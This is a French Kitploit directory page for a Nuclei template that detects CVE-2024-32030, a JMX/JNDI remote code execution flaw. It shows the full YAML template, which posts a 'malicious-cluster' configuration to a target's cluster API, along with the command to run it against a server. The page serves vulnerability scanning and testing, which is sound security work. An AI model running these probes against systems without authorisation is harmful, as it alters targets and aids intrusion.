Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-32030-Nuclei-Template — Nuclei template pour détecter la vulnérabilité CVE-2024-32030 d'exécution de code à distance via JMX JNDI par connexion serveur malveillante. | Kitploit
Outils/GitHubGitHub/huseyinstif/cve-2024-32030-nuclei-template
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubhuseyinstif/cve-2024-32030-nuclei-template

CVE-2024-32030-Nuclei-Template

Nuclei template pour détecter la vulnérabilité CVE-2024-32030 d'exécution de code à distance via JMX JNDI par connexion serveur malveillante.

Voir le dépôt
11il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Modèle Nuclei CVE-2024-32030

Description

Ce dépôt contient un modèle Nuclei pour détecter la vulnérabilité CVE-2024-32030. Cette vulnérabilité permet une exécution de code à distance via la résolution JNDI de la collection de métriques JMX.

Détails de la vulnérabilité

  • ID: CVE-2024-32030
  • Nom: JMX Metrics Collection JNDI RCE
  • Auteur: Hüseyin TINTAŞ
  • Sévérité: Critique
  • Description: Ce modèle vérifie la présence de la vulnérabilité en tentant de se connecter à un serveur JMX malveillant.
  • Tags: cve, cve2024, jmx, rce, cve2024-32030

Modèle

root@kitploit:~
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

Utilisation

Pour utiliser ce modèle, enregistrez-le sous cve-2024-32030.yaml et exécutez-le avec Nuclei :

root@kitploit:~
nuclei -t CVE-2024-32030.yaml -u http://target-server

Contact

Pour toute question ou information complémentaire, vous pouvez me contacter via :

  • LinkedIn
  • Twitter
Télécharger l’outil